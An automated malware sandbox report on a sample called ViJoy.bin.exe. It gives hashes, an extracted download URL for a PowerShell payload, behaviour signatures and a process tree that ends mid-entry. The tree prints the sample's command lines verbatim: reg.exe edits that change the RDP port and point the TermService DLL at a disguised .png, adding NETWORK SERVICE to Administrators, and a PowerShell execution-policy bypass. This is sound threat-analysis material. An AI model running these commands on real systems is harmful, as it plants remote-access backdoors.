Analysis
- max time kernel: 128s
- max time network: 113s
- platform: windows10_x64
- resource: win10v20210410
- submitted: 21-07-2021 08:36

Static task: static1

Behavioral task: behavioral1
- Sample: ViJoy.bin.exe
- Resource: win7v20210408

Behavioral task: behavioral2
- Sample: ViJoy.bin.exe
- Resource: win10v20210410
General
- Target: ViJoy.bin.exe
- Size: 6.0MB
- MD5: 03051f3c44a2c8d196c95ea458b0aff4
- SHA1: d19a86e11cccdf978ca2d1455d7026d7879869f7
- SHA256: 555f654fb51e632ba2cf49b865b6de5f5772ffba0229d73021a1c6a6f65dab08
- SHA512: 883e31033107ee9f008d34e84638fca2ee085e6cc7c41a288d1663a31beac7109efe718ab7f38f682c8e01a99736e3832c539c95fd4bf25124fed4c9e9eeba46
Malware Config
- Extracted: https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures

Grants admin privileges (1 TTPs)
Uses net.exe to modify the user's privileges.

Blocklisted process makes network request (9 IoCs)
Processes:

| flow | pid | process |
|---|---|---|
| 19 | 4880 | powershell.exe |
| 21 | 4880 | powershell.exe |
| 22 | 4880 | powershell.exe |
| 23 | 4880 | powershell.exe |
| 25 | 4880 | powershell.exe |
| 27 | 4880 | powershell.exe |
| 29 | 4880 | powershell.exe |
| 31 | 4880 | powershell.exe |
| 33 | 4880 | powershell.exe |

Executes dropped EXE (3 IoCs)
Processes:

| pid | process |
|---|---|
| 2412 | exe1.exe |
| 2396 | exe2.exe |
| 3500 | NFWCHK.exe |

Modifies RDP port number used by Windows (1 TTPs)

Sets DLL path for service in the registry (2 TTPs)

Processes:

| resource | yara_rule |
|---|---|
| \Windows\Branding\mediasrv.png | upx |
| \Windows\Branding\mediasvc.png | upx |

Loads dropped DLL (2 IoCs)
Processes:

| pid | process |
|---|---|
| 4136 | |
| 4136 | |

Writes to the Master Boot Record (MBR) (1 TTPs, 1 IoCs)
Bootkits write to the MBR to gain persistence at a level below the operating system.
Processes:

| description | ioc | process |
|---|---|---|
| File opened for modification | \??\PhysicalDrive0 | exe2.exe |

Drops file in Program Files directory (4 IoCs)
Processes:

| description | ioc | process |
|---|---|---|
| File opened for modification | C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT | powershell.exe |
| File opened for modification | C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI | powershell.exe |
| File opened for modification | C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT | powershell.exe |
| File opened for modification | C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI | powershell.exe |

Drops file in Windows directory (19 IoCs)
Processes:

| description | ioc | process |
|---|---|---|
| File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI5DA7.tmp | powershell.exe |
| File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.exe |
| File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log | powershell.exe |
| File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat | powershell.exe |
| File created | C:\Windows\branding\mediasvc.png | powershell.exe |
| File opened for modification | C:\Windows\branding\ShellBrd | powershell.exe |
| File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI5DC8.tmp | powershell.exe |
| File opened for modification | C:\Windows\branding\mediasrv.png | powershell.exe |
| File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_wq0c2djq.mgk.psm1 | powershell.exe |
| File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI5DD9.tmp | powershell.exe |
| File created | C:\Windows\branding\mediasrv.png | powershell.exe |
| File created | C:\Windows\branding\wupsvc.jpg | powershell.exe |
| File opened for modification | C:\Windows\branding\Basebrd | powershell.exe |
| File created | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP | powershell.exe |
| File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI5D87.tmp | powershell.exe |
| File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI5DB8.tmp | powershell.exe |
| File opened for modification | C:\Windows\branding\mediasvc.png | powershell.exe |
| File opened for modification | C:\Windows\branding\wupsvc.jpg | powershell.exe |
| File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_5zuegjl3.xmj.ps1 | powershell.exe |

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Modifies data under HKEY_USERS (64 IoCs)
Processes:

| description | ioc | process |
|---|---|---|
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\ | powershell.exe |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\CurrentLevel = "0" | powershell.exe |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "Computer [Protected Mode]" | powershell.exe |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA | powershell.exe |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CRLs | powershell.exe |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Flags = "1" | powershell.exe |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ftp = "3" | powershell.exe |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\SelfHealCount = "1" | powershell.exe |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA | powershell.exe |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 | powershell.exe |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1400 = "1" | powershell.exe |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft | powershell.exe |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1 | powershell.exe |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "My Computer" | powershell.exe |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.exe |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root | powershell.exe |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | powershell.exe |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\CurrentLevel = "73728" | powershell.exe |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Description = "Your computer" | powershell.exe |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Flags = "219" | powershell.exe |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | powershell.exe |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ | powershell.exe |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\DisplayName = "Internet" | powershell.exe |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows | powershell.exe |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "My Computer [Protected Mode]" | powershell.exe |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" | powershell.exe |
| Set value (data) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\e1be3f182420a0a0 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c000000 | powershell.exe |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ | powershell.exe |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Flags = "33" | powershell.exe |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\DisplayName = "Restricted sites" | powershell.exe |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1400 = "0" | powershell.exe |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | powershell.exe |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | powershell.exe |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\IE5_UA_Backup_Flag = "5.0" | powershell.exe |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "My Computer" | powershell.exe |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\LowIcon = "inetcpl.cpl#005426" | powershell.exe |
| Set value (data) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZonesSecurityUpgrade = 339704ea112ed701 | powershell.exe |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | powershell.exe |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map | powershell.exe |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\57fd7ae31ab34c2c = ",33,HKCU,SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Extensible Cache," | powershell.exe |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data." | powershell.exe |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\LowIcon = "inetcpl.cpl#005424" | powershell.exe |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections | powershell.exe |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo | powershell.exe |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Icon = "inetcpl.cpl#00004481" | powershell.exe |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\1200 = "0" | powershell.exe |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ | powershell.exe |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\shell = "0" | powershell.exe |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\LowIcon = "inetcpl.cpl#005425" | powershell.exe |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1200 = "3" | powershell.exe |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data." | powershell.exe |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\ | powershell.exe |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\@ivt = "1" | powershell.exe |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup | powershell.exe |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\PMDisplayName = "Local intranet [Protected Mode]" | powershell.exe |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Icon = "inetcpl.cpl#001313" | powershell.exe |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0 | powershell.exe |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" | powershell.exe |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | powershell.exe |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\CurrentLevel = "0" | powershell.exe |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CRLs | powershell.exe |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\PMDisplayName = "Trusted sites [Protected Mode]" | powershell.exe |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Icon = "inetcpl.cpl#00004480" | powershell.exe |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.exe |

Modifies registry key (1 TTPs, 1 IoCs)

Runs net.exe

Script User-Agent (4 IoCs)
Uses user-agent string associated with script host/environment.
Processes:

| description | flow | ioc |
|---|---|---|
| HTTP User-Agent header | 21 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) |
| HTTP User-Agent header | 22 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) |
| HTTP User-Agent header | 23 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) |
| HTTP User-Agent header | 25 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) |

Suspicious behavior: EnumeratesProcesses (18 IoCs)
Processes:

| pid | process |
|---|---|
| 3292 | powershell.exe |
| 3292 | powershell.exe |
| 3292 | powershell.exe |
| 4028 | powershell.exe |
| 4028 | powershell.exe |
| 4028 | powershell.exe |
| 4144 | powershell.exe |
| 4144 | powershell.exe |
| 4144 | powershell.exe |
| 4404 | powershell.exe |
| 4404 | powershell.exe |
| 4404 | powershell.exe |
| 3292 | powershell.exe |
| 3292 | powershell.exe |
| 3292 | powershell.exe |
| 4880 | powershell.exe |
| 4880 | powershell.exe |
| 4880 | powershell.exe |

Suspicious behavior: LoadsDriver (2 IoCs)
Processes:

| pid | process |
|---|---|
| 624 | |
| 624 | |

Suspicious use of AdjustPrivilegeToken (64 IoCs)
Processes:

| description | pid | process |
|---|---|---|
| Token: SeDebugPrivilege | 3292 | powershell.exe |
| Token: SeDebugPrivilege | 4028 | powershell.exe |
| Token: SeIncreaseQuotaPrivilege | 4028 | powershell.exe |
| Token: SeSecurityPrivilege | 4028 | powershell.exe |
| Token: SeTakeOwnershipPrivilege | 4028 | powershell.exe |
| Token: SeLoadDriverPrivilege | 4028 | powershell.exe |
| Token: SeSystemProfilePrivilege | 4028 | powershell.exe |
| Token: SeSystemtimePrivilege | 4028 | powershell.exe |
| Token: SeProfSingleProcessPrivilege | 4028 | powershell.exe |
| Token: SeIncBasePriorityPrivilege | 4028 | powershell.exe |
| Token: SeCreatePagefilePrivilege | 4028 | powershell.exe |
| Token: SeBackupPrivilege | 4028 | powershell.exe |
| Token: SeRestorePrivilege | 4028 | powershell.exe |
| Token: SeShutdownPrivilege | 4028 | powershell.exe |
| Token: SeDebugPrivilege | 4028 | powershell.exe |
| Token: SeSystemEnvironmentPrivilege | 4028 | powershell.exe |
| Token: SeRemoteShutdownPrivilege | 4028 | powershell.exe |
| Token: SeUndockPrivilege | 4028 | powershell.exe |
| Token: SeManageVolumePrivilege | 4028 | powershell.exe |
| Token: 33 | 4028 | powershell.exe |
| Token: 34 | 4028 | powershell.exe |
| Token: 35 | 4028 | powershell.exe |
| Token: 36 | 4028 | powershell.exe |
| Token: SeDebugPrivilege | 4144 | powershell.exe |
| Token: SeIncreaseQuotaPrivilege | 4144 | powershell.exe |
| Token: SeSecurityPrivilege | 4144 | powershell.exe |
| Token: SeTakeOwnershipPrivilege | 4144 | powershell.exe |
| Token: SeLoadDriverPrivilege | 4144 | powershell.exe |
| Token: SeSystemProfilePrivilege | 4144 | powershell.exe |
| Token: SeSystemtimePrivilege | 4144 | powershell.exe |
| Token: SeProfSingleProcessPrivilege | 4144 | powershell.exe |
| Token: SeIncBasePriorityPrivilege | 4144 | powershell.exe |
| Token: SeCreatePagefilePrivilege | 4144 | powershell.exe |
| Token: SeBackupPrivilege | 4144 | powershell.exe |
| Token: SeRestorePrivilege | 4144 | powershell.exe |
| Token: SeShutdownPrivilege | 4144 | powershell.exe |
| Token: SeDebugPrivilege | 4144 | powershell.exe |
| Token: SeSystemEnvironmentPrivilege | 4144 | powershell.exe |
| Token: SeRemoteShutdownPrivilege | 4144 | powershell.exe |
| Token: SeUndockPrivilege | 4144 | powershell.exe |
| Token: SeManageVolumePrivilege | 4144 | powershell.exe |
| Token: 33 | 4144 | powershell.exe |
| Token: 34 | 4144 | powershell.exe |
| Token: 35 | 4144 | powershell.exe |
| Token: 36 | 4144 | powershell.exe |
| Token: SeDebugPrivilege | 4404 | powershell.exe |
| Token: SeIncreaseQuotaPrivilege | 4404 | powershell.exe |
| Token: SeSecurityPrivilege | 4404 | powershell.exe |
| Token: SeTakeOwnershipPrivilege | 4404 | powershell.exe |
| Token: SeLoadDriverPrivilege | 4404 | powershell.exe |
| Token: SeSystemProfilePrivilege | 4404 | powershell.exe |
| Token: SeSystemtimePrivilege | 4404 | powershell.exe |
| Token: SeProfSingleProcessPrivilege | 4404 | powershell.exe |
| Token: SeIncBasePriorityPrivilege | 4404 | powershell.exe |
| Token: SeCreatePagefilePrivilege | 4404 | powershell.exe |
| Token: SeBackupPrivilege | 4404 | powershell.exe |
| Token: SeRestorePrivilege | 4404 | powershell.exe |
| Token: SeShutdownPrivilege | 4404 | powershell.exe |
| Token: SeDebugPrivilege | 4404 | powershell.exe |
| Token: SeSystemEnvironmentPrivilege | 4404 | powershell.exe |
| Token: SeRemoteShutdownPrivilege | 4404 | powershell.exe |
| Token: SeUndockPrivilege | 4404 | powershell.exe |
| Token: SeManageVolumePrivilege | 4404 | powershell.exe |
| Token: 33 | 4404 | powershell.exe |

Suspicious use of SetWindowsHookEx (2 IoCs)
Processes:

| pid | process |
|---|---|
| 2396 | exe2.exe |
| 2396 | exe2.exe |

Suspicious use of WriteProcessMemory (64 IoCs)
Processes:

| description | pid | process | target process |
|---|---|---|---|
| PID 3904 wrote to memory of 2412 | 3904 | ViJoy.bin.exe | exe1.exe |
| PID 3904 wrote to memory of 2412 | 3904 | ViJoy.bin.exe | exe1.exe |
| PID 3904 wrote to memory of 2396 | 3904 | ViJoy.bin.exe | exe2.exe |
| PID 3904 wrote to memory of 2396 | 3904 | ViJoy.bin.exe | exe2.exe |
| PID 3904 wrote to memory of 2396 | 3904 | ViJoy.bin.exe | exe2.exe |
| PID 2396 wrote to memory of 3500 | 2396 | exe2.exe | NFWCHK.exe |
| PID 2396 wrote to memory of 3500 | 2396 | exe2.exe | NFWCHK.exe |
| PID 2412 wrote to memory of 3292 | 2412 | exe1.exe | powershell.exe |
| PID 2412 wrote to memory of 3292 | 2412 | exe1.exe | powershell.exe |
| PID 3292 wrote to memory of 2460 | 3292 | powershell.exe | csc.exe |
| PID 3292 wrote to memory of 2460 | 3292 | powershell.exe | csc.exe |
| PID 2460 wrote to memory of 3972 | 2460 | csc.exe | cvtres.exe |
| PID 2460 wrote to memory of 3972 | 2460 | csc.exe | cvtres.exe |
| PID 3292 wrote to memory of 4028 | 3292 | powershell.exe | powershell.exe |
| PID 3292 wrote to memory of 4028 | 3292 | powershell.exe | powershell.exe |
| PID 3292 wrote to memory of 4144 | 3292 | powershell.exe | powershell.exe |
| PID 3292 wrote to memory of 4144 | 3292 | powershell.exe | powershell.exe |
| PID 3292 wrote to memory of 4404 | 3292 | powershell.exe | powershell.exe |
| PID 3292 wrote to memory of 4404 | 3292 | powershell.exe | powershell.exe |
| PID 3292 wrote to memory of 4824 | 3292 | powershell.exe | reg.exe |
| PID 3292 wrote to memory of 4824 | 3292 | powershell.exe | reg.exe |
| PID 3292 wrote to memory of 4844 | 3292 | powershell.exe | reg.exe |
| PID 3292 wrote to memory of 4844 | 3292 | powershell.exe | reg.exe |
| PID 3292 wrote to memory of 4864 | 3292 | powershell.exe | reg.exe |
| PID 3292 wrote to memory of 4864 | 3292 | powershell.exe | reg.exe |
| PID 3292 wrote to memory of 5044 | 3292 | powershell.exe | net.exe |
| PID 3292 wrote to memory of 5044 | 3292 | powershell.exe | net.exe |
| PID 5044 wrote to memory of 5064 | 5044 | net.exe | net1.exe |
| PID 5044 wrote to memory of 5064 | 5044 | net.exe | net1.exe |
| PID 3292 wrote to memory of 5096 | 3292 | powershell.exe | cmd.exe |
| PID 3292 wrote to memory of 5096 | 3292 | powershell.exe | cmd.exe |
| PID 5096 wrote to memory of 5112 | 5096 | cmd.exe | cmd.exe |
| PID 5096 wrote to memory of 5112 | 5096 | cmd.exe | cmd.exe |
| PID 5112 wrote to memory of 3960 | 5112 | cmd.exe | net.exe |
| PID 5112 wrote to memory of 3960 | 5112 | cmd.exe | net.exe |
| PID 3960 wrote to memory of 2684 | 3960 | net.exe | net1.exe |
| PID 3960 wrote to memory of 2684 | 3960 | net.exe | net1.exe |
| PID 3292 wrote to memory of 3700 | 3292 | powershell.exe | cmd.exe |
| PID 3292 wrote to memory of 3700 | 3292 | powershell.exe | cmd.exe |
| PID 3700 wrote to memory of 3612 | 3700 | cmd.exe | cmd.exe |
| PID 3700 wrote to memory of 3612 | 3700 | cmd.exe | cmd.exe |
| PID 3612 wrote to memory of 4112 | 3612 | cmd.exe | net.exe |
| PID 3612 wrote to memory of 4112 | 3612 | cmd.exe | net.exe |
| PID 4112 wrote to memory of 4124 | 4112 | net.exe | net1.exe |
| PID 4112 wrote to memory of 4124 | 4112 | net.exe | net1.exe |
| PID 4248 wrote to memory of 4308 | 4248 | cmd.exe | net.exe |
| PID 4248 wrote to memory of 4308 | 4248 | cmd.exe | net.exe |
| PID 4308 wrote to memory of 4328 | 4308 | net.exe | net1.exe |
| PID 4308 wrote to memory of 4328 | 4308 | net.exe | net1.exe |
| PID 4348 wrote to memory of 4216 | 4348 | cmd.exe | net.exe |
| PID 4348 wrote to memory of 4216 | 4348 | cmd.exe | net.exe |
| PID 4216 wrote to memory of 4148 | 4216 | net.exe | net1.exe |
| PID 4216 wrote to memory of 4148 | 4216 | net.exe | net1.exe |
| PID 4256 wrote to memory of 4000 | 4256 | cmd.exe | net.exe |
| PID 4256 wrote to memory of 4000 | 4256 | cmd.exe | net.exe |
| PID 4000 wrote to memory of 4428 | 4000 | net.exe | net1.exe |
| PID 4000 wrote to memory of 4428 | 4000 | net.exe | net1.exe |
| PID 4412 wrote to memory of 4532 | 4412 | cmd.exe | net.exe |
| PID 4412 wrote to memory of 4532 | 4412 | cmd.exe | net.exe |
| PID 4532 wrote to memory of 4552 | 4532 | net.exe | net1.exe |
| PID 4532 wrote to memory of 4552 | 4532 | net.exe | net1.exe |
| PID 4580 wrote to memory of 4620 | 4580 | cmd.exe | net.exe |
| PID 4580 wrote to memory of 4620 | 4580 | cmd.exe | net.exe |
| PID 4620 wrote to memory of 4644 | 4620 | net.exe | net1.exe |
Processes

- C:\Users\Admin\AppData\Local\Temp\ViJoy.bin.exe (depth 1)
  Command line: "C:\Users\Admin\AppData\Local\Temp\ViJoy.bin.exe"
  Signatures: Suspicious use of WriteProcessMemory
  - C:\Users\Admin\AppData\Roaming\Templers\exe2.exe (depth 2)
    Command line: "C:\Users\Admin\AppData\Roaming\Templers\exe2.exe"
    Signatures: Executes dropped EXE; Writes to the Master Boot Record (MBR); Suspicious use of SetWindowsHookEx; Suspicious use of WriteProcessMemory
    - C:\Users\Public\Documents\Wondershare\NFWCHK.exe (depth 3)
      Command line: C:\Users\Public\Documents\Wondershare\NFWCHK.exe
      Signatures: Executes dropped EXE
  - C:\Users\Admin\AppData\Roaming\Templers\exe1.exe (depth 2)
    Command line: "C:\Users\Admin\AppData\Roaming\Templers\exe1.exe"
    Signatures: Executes dropped EXE; Suspicious use of WriteProcessMemory
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 3)
      Command line: "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
      Signatures: Drops file in Windows directory; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe (depth 4)
        Command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\trshuemd\trshuemd.cmdline"
        Signatures: Suspicious use of WriteProcessMemory
        - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe (depth 5)
          Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2541.tmp" "c:\Users\Admin\AppData\Local\Temp\trshuemd\CSCB76A0FB192CC42A6896CCCC69F92E773.TMP"
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 4)
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
        Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 4)
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
        Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 4)
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
        Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
      - C:\Windows\system32\reg.exe (depth 4)
        Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
      - C:\Windows\system32\reg.exe (depth 4)
        Command line: "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
        Signatures: Modifies registry key
      - C:\Windows\system32\reg.exe (depth 4)
        Command line: "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
      - C:\Windows\system32\net.exe (depth 4)
        Command line: "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
        Signatures: Suspicious use of WriteProcessMemory
        - C:\Windows\system32\net1.exe (depth 5)
          Command line: C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
      - C:\Windows\system32\cmd.exe (depth 4)
        Command line: "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
        Signatures: Suspicious use of WriteProcessMemory
        - C:\Windows\system32\cmd.exe (depth 5)
          Command line: cmd /c net start rdpdr
          Signatures: Suspicious use of WriteProcessMemory
          - C:\Windows\system32\net.exe (depth 6)
            Command line: net start rdpdr
            Signatures: Suspicious use of WriteProcessMemory
            - C:\Windows\system32\net1.exe (depth 7)
              Command line: C:\Windows\system32\net1 start rdpdr
      - C:\Windows\system32\cmd.exe (depth 4)
